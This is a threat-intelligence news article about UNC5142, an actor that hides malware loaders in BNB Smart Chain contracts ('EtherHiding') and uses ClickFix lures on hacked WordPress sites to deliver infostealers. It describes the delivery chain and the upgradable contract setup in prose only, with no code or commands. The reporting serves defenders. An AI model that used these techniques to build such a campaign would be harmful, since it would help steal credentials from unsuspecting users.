UNC5142 Exploits Blockchain Technology to Distribute Information Stealers
A financially driven threat actor, identified as UNC5142, has been observed leveraging blockchain smart contracts to disseminate information-stealing malware, including variants such as Atomic (AMOS), Lumma, Rhadamanthys (also known as RADTHIEF), and Vidar, across both Windows and macOS systems.
The Google Threat Intelligence Group (GTIG) disclosed in a report to The Hacker News that UNC5142 is recognized for its exploitation of compromised WordPress websites, along with a technique called ‘EtherHiding.’ This method obscures malicious code by embedding it into a public blockchain, notably the BNB Smart Chain.
As of June 2025, Google indicated it had flagged approximately 14,000 web pages featuring injected JavaScript consistent with UNC5142’s operational tactics, underscoring the indiscriminate targeting of vulnerable WordPress sites.
However, they noted a cessation of activity since July 23, 2025, which may suggest a strategic pause or a shift in operational methods.
EtherHiding was first documented by Guardio Labs in October 2023, which revealed attacks deploying malicious code via Binance’s Smart Chain contracts. These were typically spread through sites masquerading as updates for web browsers.
A key element of these attacks is a multi-stage JavaScript downloader referred to as CLEARSHORT, which facilitates the malware’s distribution through these compromised sites.
The initial stage involves the incorporation of JavaScript malware into plugins and theme files, or even directly within the WordPress database, to retrieve the subsequent stage via interaction with a malicious smart contract on the BNB Smart Chain.
The smart contract functions to obtain a CLEARSHORT landing page from an external server, utilizing the ClickFix social engineering maneuver to dupe users into executing malicious commands.
This approach targets the Windows Run dialog or the Terminal app on Macs, ultimately culminating in the deployment of the stealer malware.
Such landing pages are typically hosted on an encrypted format within a Cloudflare dev domain as of December 2024.
In Windows-specific attacks, the malicious command executes an HTML Application (HTA) file downloaded from a MediaFire URL.
This process drops a PowerShell script designed to bypass security defenses, later fetching the encrypted payload from either GitHub, MediaFire, or other infrastructures, running the stealer entirely in memory without leaving traces on the disk.
For macOS-centric attacks observed in February and April 2025, the attackers employed ClickFix decoys. These encouraged users to run a bash command in the Terminal, which subsequently invoked a shell script that used the curl command to retrieve the Atomic Stealer payload from a remote server.
CLEARSHORT is believed to be an iteration of ClearFake, a JavaScript framework subjected to comprehensive analysis by the French cybersecurity firm Sekoia in March 2025. ClearFake has reportedly been operational since July 2023, with ClickFix tactics emerging around May 2024.
The exploitation of blockchain technology provides several advantages, allowing UNC5142 to blend seamlessly with legitimate Web3 activities while enhancing the resilience of its operations against detection and intervention.
According to Google, the threat actor’s methodologies have evolved significantly in the past year, transitioning from a singular-contract framework to a more intricate system utilizing three smart contracts starting in November 2024. This shift aims for improved operational agility, with notable refinements detected as recently as January.
This innovative architecture resembles a legitimate software development principle known as the proxy pattern, which is employed by developers to create upgradable contracts.
The setup resembles a Router-Logic-Storage architecture that assigns specific roles to each contract. This configuration permits swift modifications to critical elements of the attack, such as landing page URLs or decryption keys, without necessitating alterations to the JavaScript embedded within compromised websites. Consequently, the campaigns exhibit heightened agility and resistance to takedown efforts.
UNC5142 exploits the mutable characteristics of smart contract data—while the program code itself remains immutable after deployment—to adjust the payload URLs, incurring network fees ranging from $0.25 to $1.50 for these updates.
Further investigations revealed that the threat actor employs two distinct sets of smart contract infrastructures for deploying stealer malware via the CLEARSHORT downloader.
The primary infrastructure was established on November 24, 2024, while the auxiliary Secondary infrastructure was funded on February 18, 2025.
GTIG characterized the Main infrastructure as the backbone of the campaign, highlighted by its earlier inception and consistent updates.
The Secondary infrastructure appears to serve as a tactical extension, possibly devised to accommodate spikes in activity, test new lures, or bolster operational resilience.
Given the frequent updates to the infection chain, combined with a sustained operational tempo, a wide array of compromised websites, and the diverse malware payloads distributed over the last 18 months, it is probable that UNC5142 has achieved a measure of success with its initiatives.
Source link: Thehackernews.com.
